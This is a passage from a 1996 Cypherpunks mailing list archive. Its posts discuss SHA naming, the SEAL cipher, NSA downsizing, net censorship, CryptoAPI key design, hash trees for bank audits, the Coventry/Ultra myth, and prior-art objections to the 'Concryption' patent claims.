I think that has a bit to do with a question I had, whether it was SHA
and SHA-1 (aka "Revised SHA") but I've found the revised version being
referred to as "SHA-2" in a couple of sources and went with that....
unless there *is* a third revision...?!?

Problem is the memo I saw still referred to the revised algorithm as
SHA.  (Anyone have a URL for FIPS 180-1 Please...?)

Rob.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 28 Jan 1996 08:39:39 +0800
To: cypherpunks@toad.com
Subject: SEAL cipher info requested (something actually list related!)
Message-ID: <199601280027.BAA07662@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Anybody have info on the SEAL cipher?  I can't find any
descriptions or analysis of it.  Refs, proceedings or URLS
would be a good thing.

(It isn't related to NSEA is it?!?)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 28 Jan 1996 14:57:48 +0800
To: cypherpunks@toad.com
Subject: Re: German service cuts Net access
Message-ID: <199601280630.BAA02016@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



To momentarily flog a dead horse, banning content only makes it more
desirable. Fortunately, the economic aspect doesn't seem to hold true
for now; i.e., when real world objects are banned, they become more
expensive to access (cf. the artificially inflated prices of heroin,
cocaine, LSD, etc). Information, OTOH, so far does not seem subject
to this cause-and-effect rule. Italics: So Far. The less regulated
and more diverse the net becomes, the more the relative prices for
commodities (disk space, CPU cycles, bandwidth) will accurately
reflect their "true" value at any given moment. Anyway, my original
point was just to remind everyone of what they should already know:
namely, that people may not care about not doing something until
they are told that they cannot, at which point they will move heaven
and earth to Do the Deed. Statists (and a lot of child psychologists)
call it "obstinate" or "defiant". ObAside: If you haven't yet, read
the latest DSM (the holy writ of the so-called "mental health"
profession). Ugly stuff. Who is allowed to define "normal"? Who profits
from the creation of such definitions and labelling of individuals?

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 28 Jan 1996 09:03:15 +0800
To: cypherpunks@toad.com
Subject: RANT: When hi-tech is a hinderance (freedom w/in limits)
Message-ID: <199601280048.BAA08157@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



A short 'rant' on techno-dinosaurism...

Saw a blurb on CNN last night about computerized missiles
that would defeat jamming devices and analyze the type of
target and configure their warheads appropriately.  All that
I could think of is what an expensive waste of computing
machinery... is the cost of a "genius bomb" (assuming it 
does actually work, unlike the Patriots in Gulf War) worth
while?  Wouldn't it be better to use a lot of dumb bombs that
launch several millions of dollars apiece at a tank or bit
of artillery?

I'm reminded of the tech they used to detect guerrillas in
Vietnam... sensors that went off when uric acid (?) was present
so the VC would pis in buckets and walk away, making the
sensors go wild... the US put a lot of effort into bombing
pis buckets.

Or look back to the 13th century when European soldiers were
high-tech wearing tons of armor and used cross bows.  it was
imposing high-tech for the time, but they couldn't move fast or
fire arrows quickly... and they were skagmeat for Mongols
who were comparatively low-tech.

Cypherpunks or crypto relevance?  Sometimes high-tech can be
a weakness.

I've heard that the Soviets, not having the luxury of sexy
Crays and whatnot, were adept and using hundreds of PCs to
do their cryptanalysis... and so may have a lot of interesting
parallel processing algorithms.

To paraphrase Miles Davis, creativity is "freedom within
limitations".










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 16:58:16 +0800
To: cypherpunks@toad.com
Subject: Downsizing the NSA
Message-ID: <ad3075d502021004640c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:33 PM 1/27/96, hallam@w3.org wrote:

>They probably should do, the NSA was critical in ensuring the demise
>of the USSR and in maintaining stability throughout the cold war period.
>
>The point is not that the NSA had no military function. The point is that
>it is now an agency searching for a role. It is often a dangerous thing
>for the military to involve itself in civil affairs.

I agree with this strongly. From my readings about the NSA in particular
and SIGINT in general, they played a valuable role in the 1950-1990 Cold
War period. (I'm not so sure a world war would have resulted in some
alternate history where the NSA did not exist, but I suspect things might
have been more chaotic and that war might have been likelier. I am thus
prepared to give credit to the NSA where credit is due.)

However, as Phill notes, the NSA and other intelligence agencies are now in
that most dangerous of positions: a powerful agency or department casting
about for something to do.

Spying on citizens and keeping the keys to their private communications and
diaries is not an appropriate option.

AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
just do the right thing: admit that the Soviet threat is no more,
congratulate the victors, and downsize by 20,000 employees?

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Jan 1996 18:32:23 +0800
To: Jack Hammer <jh@teleport.com>
Subject: [NOISE] Re: NWLibs> Re: Anonymous trashing of Assassination Politics
In-Reply-To: <Pine.SUN.3.91.960127211250.11265B-100000@linda.teleport.com>
Message-ID: <Pine.ULT.3.91.960128020111.27229c-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 27 Jan 1996, Jack Hammer wrote:

> Here might be an interesting example of a snippet from a plot to commit 
> criminal syndicalism.

You know, I'm not really sure whether you're kidding, ignorant, cheering, 
or warning. Frankly, I don't fucking care. You guys are all nuts. And I 
should know -- ask Clark or AlanD.

I don't think this belongs in cypherpunks. I'll spam my response to the
other lists. 

I have saved Jim Bell's "Assassination Politics" essay, with his PGP 
signature, and soon to be a lot of other things, at 

 http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/

I plan to collect as many off-the-wall conspiracy theories in this 
directory as will fit in my disk quota. And when I run out of quota, I'll 
raise it for myself.

A pox on all your houses.

I think it's time the wacky right and wacky left started looking at each
other's Web pages and lurking on each others' lists. It's really funny
putting two "Anarchist" pages, one featuring Che Guevara, the other
featuring David Duke, side by side. Both say the guvment is out to get
them; they often have diametrically opposed interpretations of the same 
facts. I shall endeavor to facilitate an exchange. 

- -rich

[chomp]

> HAMMERNET-L NOW DAILY 08:00 to 09:00 7.56 khz TVRO C-1 Ch.15., 1150 AM 
> Pacific Northwest.

Oh, goodie. I don't suppose that's enough power to reach down here? I 
already listen to KPFB and a couple of Patriot stations on the shortwave.

>                            HOW TO JOIN THE HAMMERNET. 
> 
> Receive the most interesting e-mail and get to know the best writers on
> the Internet. Saints and flamers, they're on the Hammernet! Here's how to
> join. Send the following message in the body of your text space to
> majordomo@teleport.com : 
> 
>                            subscribe hammernet-l
> 
>                            It's as easy as that!

Woo woo!

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQtMoY3DXUbM57SdAQGbtQQA3UMlm+pe30w4tgiEqhP8/4rjhmJbZMlL
DnRx+IlrzrusNDoX1D2aIgA0KfjWYeROJ1Px/Tb5u6I0qf8PfnhgGVkvHXbW//1O
t7mO19pEjGt8qb2Vvvo9uU5Pe2sEziB6j3UX/mgGASFKyV13LXy3Ld3JVxOq7cTj
TUs6HjI6p/E=
=9NS6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Sun, 28 Jan 1996 19:23:08 +0800
To: cypherpunks@toad.com
Subject: Re: PIDAHO and EUDORA PRO 2.2
Message-ID: <2.2.32.19960128111051.00674608@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 1/27/96 -0800, jdoe-0007@alpha.c2.org wrote:
>In response to the "what has John Doe got that PIDAHO doesn't" messages I
tried to
>PIDAHO v2.6b.  I am unable to make it work.  Messages from PIDAHO can not
be sent to
>the selected and OnLine EUDORA PRO application. 

Um, yes, indeed they can. I do it routinely. Eudora Pro is one of the
options in the drop-down list box in the E-mail|Transfer options... dialog,
right below the buttons for canned settings. And it works just fine. You are
making sure that you've got Eudora with a blank new message ready to go, right?

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sun, 28 Jan 1996 18:10:30 +0800
To: cypherpunks@toad.com
Subject: CP LITE: A Censorship Device?
Message-ID: <199601280956.CAA19572@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been watching this CP Lite thing develop.

Sounds like an attempt to moderate the list.
I mean it's easy to post out of it,
but hard to answer to it.
And all of the good back and forth discussion
gets lost in a backwash of private email.

There is just no way I will send someone an
email to a posting they post out of there.
I think that would be a disservice to everyone here.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Sun, 28 Jan 1996 12:16:12 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601280353.EAA16076@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Belgian TV (the dutch language channel) has a page on teletext (Ceefax)
[I don't think US tv has that feature] stating that the French backbone
is thinking about blocking sites that provide information that they deem
ethicly unacceptable, like sites that promote the denial of Konzentrations
Lagers, the extreme right, pornografic and pedophile sites.

[page 128 BRTN, for those who can receive BRT]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jan 1996 18:23:28 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Downsizing the NSA
In-Reply-To: <ad3075d502021004640c@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960128050809.19570B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 28 Jan 1996, Timothy C. May wrote:

> AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
> just do the right thing: admit that the Soviet threat is no more,
> congratulate the victors, and downsize by 20,000 employees?


   You didn't read about it in the _Baltimore Sun_, so obviously it must not 
have happened?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 22:47:56 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <199601281436.GAA22473@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>James A. Donald writes:

> > A notable misfeature of the API is that it assumes that in general 
> > you will have two key pairs.  One for signing and one for encrypting.
> > 
> > Since in the most common case you are encrypting something related to a
> > signed message by the person you are encrypting to, this is a
> > bad idea, 

At 07:59 AM 1/27/96 -0500, Futplex wrote:

> Could you elaborate ?  I haven't heard of any known interaction
> effects between a strong encryption algorithm and a distinct strong digital
> signature algorithm (with or without distinct keys),

I was concerned about a different issue:

Suppose you have some signed information:  You wish to send some encrypted
information to the person who wrote that signed information.

If the signing key and the encrypting key are the same, your software can
locally ensure that you encrypt with the right key, (The correct key is the
same public key that you used to check the signature on the message.)

If the signing key and the encrypting key are different, then in order to
ensure that you are not spoofed into using the wrong public key, the
whole protocol must work correctly, exposing many more points of attack, 
since key management is the most complex and most vulnerable area.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 28 Jan 1996 20:10:21 +0800
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: Hash trees and bank solvency.
Message-ID: <2.2.32.19960128115355.0097fcf4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 1/27/96 -0800, James A. Donald wrote:
>A hash tree can provide proof to a banks customers that the bank only
>has the amount outstanding that it claims to have, without the need
>for gunmen to check the totals.

Ask Eric Hughes (one of our founders) to describe his Open Books Protocol
for you.  You're a few years too late.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 28 Jan 1996 20:12:48 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <2.2.32.19960128115634.00977b14@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 AM 1/28/96 -0800, Timothy C. May wrote:
>* the Germans recently arrested an American who landed in Germany
>somewhere, as part of a trip. It seems he had been involved with the
>production of Neo-Nazi material, somewhere out west. This was the last I
>heard about the story. Sorry, I'm going from carbon-based memory.
>


He was grabbed in Denmark and extradited to Germany so you'd have to avoid
most of the EU.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 23:51:31 +0800
To: cypherpunks@toad.com
Subject: Re: Hash trees and bank solvency.
Message-ID: <199601281534.HAA24247@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



>"James A. Donald" <jamesd@echeque.com> writes:
>
> > One solution to this problem is government auditors.
> > Government inspectors, unlike private auditors, can force
> > their way in, in the early hours of the morning, and as each
> > bank employee turns up, take him to a separate cubicle and
> > interogate him with a gun in one hand and an account book in
> > the other.  This makes it difficult for the financial
> > institution to fabricate a misleading picture of its
> > financial situation.

At 10:43 PM 1/27/96 -0800, Mike Duvos wrote:
>This would be killing a mosquito with a flyswatter. Besides, the
>employees of a financial institution may be in no position to
>accurately state its financial situation, even if they are in
>little cubicles with guns to their heads.

I refer to actual practice, not to theory:  (Though the guns 
are only metaphorically held to peoples heads, the examiners 
forcing their way in at dawn and ambushing the senior employees as 
they arrive are entirely literal.)

The objective is to take them by surprise and interrogate them
separately, to avoid them "hiding" some customers and some
liabilities.

If the element of surprise is lost, the examiners are likely to
be confronted with truckloads of plausible, consistent, and 
entirely bogus documentation, as happens regularly.

> A somewhat more civilized method is used by my broker, [...]

Of course a broker's opportunity to pull this kind of fraud is less
than a banks, because his customers will generally hold diverse
stocks.  Suppose the broker has embezzled some IBM stocks.  
Then he will have to leave out some customers that own IBM stocks
from his record keeping.   But this will frequently result in
inconvenient excesses of other stocks and unexplained transactions
in other stocks, thus the needed book shuffling is more elaborate 
and inconvenient than that of a bank.


> I would trust the typical customer to mail back a form to an
> outside auditor far more than I would trust him to examine a hash
> tree, check his own entry, check the neighborhood of his own
> entry for cryptographic integrity, and sound an alarm.

But it only requires one customer to discover the failure in
in a cryptographic tree, whereas to discover the failure in
the method of book keeping you describe, we have to be sure
we have covered all customers, and we have to be sure that
they receive the same information that the auditor does, and how
can one ensure that, except by the dawn raid method?

> To be perfectly candid, I would not even want the task of
> explaining to the typical banking customer what a hash tree was.

That is what software is for:  The task would of course have
to be done by financial software, not done by hand.

> The outside auditor can of course be spoofed by giving him access
> only to some subset of customer accounts.  The hash tree can be
> spoofed by not telling a subset of customers of its existance.

Set up the protocols so that software that verifies the hash tree
generates certificates that are proof that you are eligible to
receive the money, and software that does not, cannot generate
provably valid certificates.

Then if the institution comitts the fraud you describe, the ill
informed customers who use the rigged software get stiffed, as 
they cannot easily prove that they were owed, and the better 
informed customers do not get stiffed.

Notice that the above system requires that the banking software
be supplied independently and separately from the bank.

Customer expertise will improve dramatically after the first fraud,
much as computer security improves dramatically after the first
breach.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@crl.com (Alan Westrope)
Date: Sun, 28 Jan 1996 23:50:13 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601262228.RAA21968@jekyll.piermont.com>
Message-ID: <n+4Cxo9g/YEb085yn@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jan 1996, "Perry E. Metzger" <perry@piermont.com> wrote:

> jim bell writes:
> > (For the historically-impaired:  Coventry was/is an English town (small 
> > city?) perhaps most famous from the Lady Godiva legend...but I digress...    
> >  British found out, I guess through Ultra, that it was going to be bombed.  
> > Telling the inhabitants would have saved many lives, but (possibly) alerted 
> > the Germans that Enigma had been broken.  British made the correct choice:  
> > Let the city get bombed without (much?) warning.  The value of keeping the 
> > broken-ness of Ultra a secret far outweighed the value of Coventry.)

> The current claim is that, in fact, there was no advance warning about
> Coventry and that the claims that there was are unsubstantiated.

Correct; here's my two Simoleons' worth toward exorcising the "Churchill
Anguished Over Coventry Bombing" meme:

    The first international conference of cryptologists took place in
    Germany in November of 1978.  The backroom boys of World War II --
    Allied communications intelligence experts and Axis communications
    security specialists -- met under scholarly sponsorship to try to
    determine the effect of codebreaking on the war. [...] Dr. Forrest
    Pogue, author of the standard biography of General George C. Marshall,
    U.S. Army chief of staff, said that [...] 15 to 20 years is the time
    lag for facts to catch up with fiction.  That's how long it will take
    for the false story that Winston Churchill allowed Coventry to be
    destroyed to save the secret of ULTRA "to stop being used to keep
    sophomores awake in the classroom."

  David Kahn, "The ULTRA Conference," Cryptologia, January 1979

Alan Westrope     PGP public key:  http://www.nyx.net/~awestrop
<awestrop@nyx.net>
<awestrop@crl.com>
PGP 0xB8359639:   D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQuU6FRRFMq4NZY5AQH67AP/WmQjKge1yVM1jbqSQo2B7xoCEaK/BDpW
Bh0C4C5BL0potn5tLJS7D6p3gCELQlcmtoJcHjngm+wj3a+dl9x/7vQ5Y83cUPAK
C4VHKiRyran3IB/V/ZOt6TcDP0FdkgTuyofuC3u196km5NmlpEEGwfDQEA2Zcgur
6l0sV4mj3PA=
=EqBe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 28 Jan 1996 22:09:07 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISE] Re: NWLibs> Re: Anonymous trashing of Assassination Politics
Message-ID: <199601281354.IAA05861@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 28, 1996 02:17:11, 'Rich Graves <llurch@networking.stanford.edu>'
wrote: 
 
 
>-----BEGIN PGP SIGNED MESSAGE----- 
> 
>On Sat, 27 Jan 1996, Jack Hammer wrote: 
> 
 
> 
>I think it's time the wacky right and wacky left started looking at each 
>other's Web pages and lurking on each others' lists. It's really funny 
>putting two "Anarchist" pages, one featuring Che Guevara, the other 
>featuring David Duke, side by side. 
> 
 
I don't understand the crypto-relevance of this, but since it was posted: 
 
1) What "anarchist" group featured a photo of Che Guevara; 
 
2) When did the KKK that at one time proudly had Sheriff's. Judges, and
Governor's as members become "Anarchist"? 
 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 28 Jan 1996 22:20:35 +0800
To: cypherpunks@toad.com
Subject: SDTI Patent (was "Concryption" patent)
Message-ID: <ad3094f2000210042466@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Here are the Claims to the "Concryption" patent (5,479,512) that
was just issued. I've annotated the claims with thoughts about
how they shouldn't apply. For those who don't know patent law,
the system is very heirarchical. For instance claim 1 here is
known as a base claim. Claim 2 is dependent on claim 1.

I believe that Claim 1 would be ruled invalid because of the
prior art contained in my Cryptologia article, "A Redundancy
Reducing Cipher" published in May 88. The journal is found in
many university libraries so I don't think there should be any
argument about the nature of publication.

The article describes how to encipher text by permuting a
Huffman tree used to compress data. The idea was to add some
noise to the compression phase of any encryption. Huffman
compression works by building a big binary tree. The characters
are held in the leaves of the tree. The code for a particular
character is specified by the path from the root to the leaf.
Ordinarily, the left branch is given a 0 and the right branch is
specified by a 1. This addressing remains fixed throughout the
compression. I suggested flipping these addressing bits at some
pseudorandomly determined interval. The purpose of the paper was
to do compression and encryption at the same time.

For that reason, I believe the paper reads directly against
Claim 1, a claim that I also believe is overly broad.  The rest
of the claims seem obvious to me because they borrow well-known
techniques from well-known ciphers like DES. "Obviousness" is a
really non-obvious detail in patent law. Essentially, an idea is
not patentable if the idea is "obvious" to one practiced in the
art. Naturally, this is very hard to define and it depends upon
plenty of case law. In my mind, the only novelty is their
integration with claim 1. I don't know enough about
"obviousness" in this case, but I wouldn't be surprised if the
entire patent failed to hold up under scrutiny.

-Peter Wayner


>CLAIMS: What is claimed is:
>
>   1. A method for utilizing a data processor to change the
>form of data
>comprising the steps of:
>
>   a) obtaining the data at the processor in clear form;
>
>   b) obtaining an encryption key at the processor;
>
>   c) the processor performing a multi-step compression
>operation on said
>clear-form data;
>
>   d) the processor automatically utilizing said encryption key
>in conjunction
>with the results as directly generated by the processor for a
>selected step of
>said compression operation in performing an encryption
>operation, the
>compression steps of step (c) and the encryption step of step
>(d) being
>integrated to be performed as parts of a single operation; and
>
>   e) the processor outputting the resulting compressed and
>encrypted version
>of the clear-form data.
>
>   2. A method as claimed in claim 1 wherein step (e) includes
>the step, of
>storing the resulting compressed and encrypted data in memory.

This should be obvious to anyone skilled in the art of
programming a computer.
>
>   3. A method as claimed in claim 1 wherein step (e) includes
>the step of
>transmitting the resulting compressed and encrypted data.

This should be obvious to anyone skilled in the art of
programming a computer.

>
>   4. A method as claimed in claim 1 wherein said encryption
>key is a code
>derived from a token.

This should be obvious to anyone skilled in the art of
programming a computer.
>
>   5. A method as claimed in claim 4 wherein the code derived
>from a token is
>a one-time nonpredictable code.

I'm not sure what a one-time, unpredictably code. But it would
help if both sides could have access to it. This should be
obvious to anyone skilled in the art of programming a computer.

>
>   6. A method as claimed in claim 1 wherein step (d) includes
>the steps
>performed by the processor of dividing the results of the
>selected step of the
>compression operation into a plurality of segments, selecting
>an encryption
>key for each segment and performing an encryption operation for
>each segment
>utilizing the corresponding encryption key.

This should be obvious to anyone skilled in the art of creating
a crypto
system. Block ciphers are very common. DES is well known.

>
>   7. A method as claimed in claim 6 wherein the step of
>selecting an
>encryption key includes the step of processing the obtained
>encryption key to
>form a separate encryption key for each of the plurality of
>segments.

Key permutation is also well-known. One form of DES uses the
result from the previous block to change the key for the next
block.
>
>   8. A method as claimed in claim 6 wherein the step of
>selecting an
>encryption key includes the step of utilizing the same
>encryption key for all
>segments.

Big deal.
>
>   9. A method as claimed in claim 1 wherein step (d) includes
>the steps
>performed by the processor of dividing the results of the
>selected step of the
>compression operation into a plurality of segments, utilizing
>the obtained
>encryption key to perform an encryption operation for a first
>of said
>segments, and utilizing a selected function of at least a
>portion of the
>encryption operation for a given segment as the encryption key
>for performing
>an encryption operation on a succeeding segment.

Should be obvious for the usual reasons. DES did cipher block
chaining.
>
>   10. A method as claimed in claim 9 wherein the data is text
>and wherein a
>segment is N lines of such text, where N is an integer.

Big deal.
>
>   11. A method as claimed in claim 1 wherein the encryption
>operation
>includes the step of the processor performing an exclusive
>ORing operation
>with the encryption key and the results of the selected step.

Should be obvious. The method is used in other systems.
>
>   12. A method as claimed in claim 1 wherein step (b) includes
>the step of
>forming the encryption key by exclusive ORing a password for a
>system user
>with a code derived from a token in the possession of the user.
>
>   13. A method as claimed in claim 1 wherein step (c) includes
>the step of
>the processor performing an initial run-length encoding
>operation on the
>
>clear-form data and
>
>   wherein step (d) is performed on the results of the
>run-length encoding
>step.
>
>   14. A method as claimed in claim 1 wherein step (d) is
>performed on at
>least one element used in a compression step.
>
>   15. A method as claimed in claim 14 wherein the element on
>which encryption
>is performed is a table used in performing a compression step.
>
>   16. A method as claimed in claim 1 including the step of
>restoring the data
>to clear form for utilization, said restoring step including
>the steps of
>performing at least one decompression operation and at least
>one deencryption
>operation, said decompression and deencryption steps being
>performed in
>reverse order to the performance of steps (c) and (d).
>
>   17. A method for utilizing a data processor to concrypt data
>comprising the
>steps of:
>
>   the processor obtaining the data in clear form;
>
>   the processor performing a concryption operation on the
>clear data, said
>concryption operation including at least one compression step
>and at least one
>encryption step automatically performed in a selected sequence
>as an integral
>operation; and
>
>   the processor outputting the resulting concrypted data.
>
>   18. A method as claimed in claim 17 including the step
>performed at a data
>processor of deconcrypting the concrypted data to permit use
>thereof in clear
>form, the deconcrypting step including at least one
>decompression step and at
>least one deencryption step performed automatically in a
>sequence which is
>substantially the reverse of said selected sequence.
>
>   19. A method as claimed in claim 17 wherein an encryption
>step is performed
>on the results of at least one stage of a compression step.
>
>   20. A method as claimed in claim 17 wherein an encryption
>step is performed
>on at least one element used in a compression step.


The rest of these are just apparatus claims that seem to repeat
the earlier, more abstract "method" claims in different form.
Patent law has traditionally distinguished between an idea for
doing something, the "method", and the machines that actually do
it, "the apparatus." I didn't see anything new here.
>
>   21. Apparatus for utilizing a data processor to change the
>form of data
>comprising:
>
>   means for obtaining the data at the processor in clear form;
>
>   means for obtaining an encryption key at the processor;
>
>   means for performing at the processor a multi-step
>compression operation on
>said clear-form data;
>
>   means at the processor for automatically utilizing said
>encryption key in
>conjunction with the results as directly generated by the
>processor for a
>selected step of said compression operation in performing an
>encryption
>operation, the compression performed by the compression means
>and the
>encryption performed by the encryption means being integrated
>to be performed
>as parts of
>
>the same operations; and
>
>   means at the processor for outputting the resulting
>compressed and
>encrypted version of the clear-form data.
>
>   22. Apparatus as claimed in claim 21 wherein the means for
>performing an
>encryption operation includes means at the processor for
>dividing the results
>of the selected step of the compression operation into a
>plurality of
>segments, and means for performing an encryption operation for
>each segment
>utilizing the corresponding encryption key.
>
>   23. Apparatus as claimed in claim 22 wherein the means for
>selecting an
>encryption key includes means for processing the obtained
>encryption key to
>form a separate encryption key for each of the plurality of
>segments.
>
>   24. Apparatus as claimed in claim 21 wherein the means for
>performing an
>encryption operation includes means at the processor for
>dividing the results
>of the selected step of the compression operation into a
>plurality of
>segments, means for utilizing the obtained encryption key to
>perform an
>encryption operation for a first of said segments, and means
>for utilizing a
>selected function of at least a portion of the encryption
>operation for a
>given segment as the encryption key for performing an
>encryption operation on
>a succeeding segment.
>
>   25. Apparatus as claimed in claim 21 wherein the means for
>performing an
>encryption operation includes means at the processor for
>performing an
>exclusive ORing operation with the encryption key and the
>results of the
>selected step.
>
>   26. Apparatus as claimed in claim 21 wherein the means for
>performing a
>multistep compression operation includes means at the processor
>for performing
>an initial run-length encoding operation on the clear-form
>data; and
>
>   wherein the encryption operation is performed on the results
>of the run-
>length encoding operation.
>
>   27. Apparatus as claimed in claim 21 including means for
>restoring the data
>to clear form for utilization, said means for restoring
>including means for
>performing at least one decompression operation and at least
>one deencryption
>operation, said decompression and deencryption operations being
>performed in
>reverse order to the performance of compression and encryption
>by said means
>for compressing and said means for encrypting, respectively.
>
>   28. Apparatus for utilizing a data processor to concrypt
>data comprising:
>
>   means for obtaining the data at the processor in clear form;
>
>   means for performing a concryption operation at the
>processor on the clear
>data, said concryption operation including means for performing
>at least one
>compression step and means for performing at least one
>encryption step, said
>compression and encryption steps being automatically performed
>in a selected
>sequence as an integrated operation; and    means for the
>processor outputting
>the resulting concrypted data.
>
>   29. Apparatus as claimed in claim 28 including means at a
>data processor
>for deconcrypting the concrypted data to permit use thereof in
>clear form, the
>means for deconcrypting including means for performing at least
>one
>decompression step and means for performing at least one
>deencryption step;
>the decompression and deencryption steps being performed
>automatically in a
>sequence which is substantially the reverse of said selected
>sequence.
>

<< end of forwarded material >>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 28 Jan 1996 22:33:05 +0800
To: cypherpunks@toad.com
Subject: YAN_kel
Message-ID: <199601281412.JAA20616@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-28-96. NYT:

   A "Viewpoint" article not on the NYT Web site:

   "Standoff in Cyberspace Gulch," by a Yankelovich author of
   the recent Cybercitizen Survey, reports on the showdown
   shaping up as the law moves into cyberspace, highlighting
   the clash between citizen fears about security and the
